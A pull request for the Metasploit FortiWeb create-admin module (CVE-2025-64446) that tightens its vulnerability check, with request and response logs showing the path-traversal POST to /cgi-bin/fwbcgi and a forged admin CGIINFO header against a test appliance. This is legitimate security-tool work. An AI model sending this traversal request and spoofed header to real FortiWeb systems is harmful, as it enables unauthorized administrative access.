### PR TITLE
Improve the fortinet_fortiweb_create_admin aux module check method

### DIFF
--- a/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
+++ b/modules/auxiliary/admin/http/fortinet_fortiweb_create_admin.rb
@@ -74,7 +74,14 @@ class MetasploitModule < Msf::Auxiliary
 
     return Exploit::CheckCode::Safe('Received a 403 Forbidden response') if res.code == 403
 
-    Exploit::CheckCode::Appears
+    j = JSON.parse(res.body)
+
+    # Tested against vulnerable FortiWeb versions 8.0.1, 7.4.8, 6.4.3, and 6.3.9
+    return Exploit::CheckCode::Appears if j.dig('results', 'errcode') == -56
+
+    Exploit::CheckCode::Unknown('Unexpected JSON results')
+  rescue JSON::ParserError
+    return Exploit::CheckCode::Unknown('Failed to parse JSON body')
   end
 
   def run


### PR DESCRIPTION
This PR fixes an issue with the check method for the fortinet_fortiweb_create_admin aux module (CVE-2025-64446). This module was not inspecting the returned contents from a POST request for any expected values, and instead assuming a target was vulnerable with a very lax test of the HTTP return code.

A better check implementation is already present in the accompanying [fortinet_fortiweb_rce.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/fortinet_fortiweb_rce.rb#L132-L147) exploit module (CVE-2025-64446 + CVE-2025-58034).

This pull request adds the same logic from the fortinet_fortiweb_rce module to fortinet_fortiweb_create_admin (now testing for an expected error value (-56) in the HTTP response JSON content).


## Example 1
This is the check showing a real vulnerable target appliance (FortiWeb 7.4.2) is vulnerable.
```
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
####################
# Request:
####################
POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 192.168.86.201
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
CGIINFO: eyJ1c2VybmFtZSI6ImFkbWluIiwicHJvZm5hbWUiOiJwcm9mX2FkbWluIiwidmRvbSI6InJvb3QiLCJsb2dpbm5hbWUiOiJhZG1pbiJ9
Content-Type: application/json
Content-Length: 11

{"data":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Apr 2026 16:35:52 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: Script-Src 'self', frame-ancestors 'self'; Object-Src 'self'; base-uri 'self';
X-Content-Type-Options: nosniff
Content-Length: 74
Connection: close
Content-Type: application/json

{ "results": { "errcode": -56, "message": "Empty value isn't allowed." } }
[*] 192.168.86.201:443 - The target appears to be vulnerable.
```

## Example 2
This shows a true negative (a simple HTTP server `ruby -run -e httpd . -p 8000` responding with a 404). Previously this was a false positive.
```
msf auxiliary(admin/http/fortinet_fortiweb_create_admin) > check
####################
# Request:
####################
POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
CGIINFO: eyJ1c2VybmFtZSI6ImFkbWluIiwicHJvZm5hbWUiOiJwcm9mX2FkbWluIiwidmRvbSI6InJvb3QiLCJsb2dpbm5hbWUiOiJhZG1pbiJ9
Content-Type: application/json
Content-Length: 11

{"data":{}}
####################
# Response:
####################
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=ISO-8859-1
Server: WEBrick/1.9.1 (Ruby/3.3.8/2025-04-09)
Date: Wed, 15 Apr 2026 16:35:27 GMT
Content-Length: 284
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<HTML>
  <HEAD><TITLE>Not Found</TITLE></HEAD>
  <BODY>
    <H1>Not Found</H1>
    '/cgi-bin/fwbcgi' not found.
    <HR>
    <ADDRESS>
     WEBrick/1.9.1 (Ruby/3.3.8/2025-04-09) at
     127.0.0.1:8000
    </ADDRESS>
  </BODY>
</HTML>

[*] 127.0.0.1:8000 - Cannot reliably check exploitability. Failed to parse JSON body
```
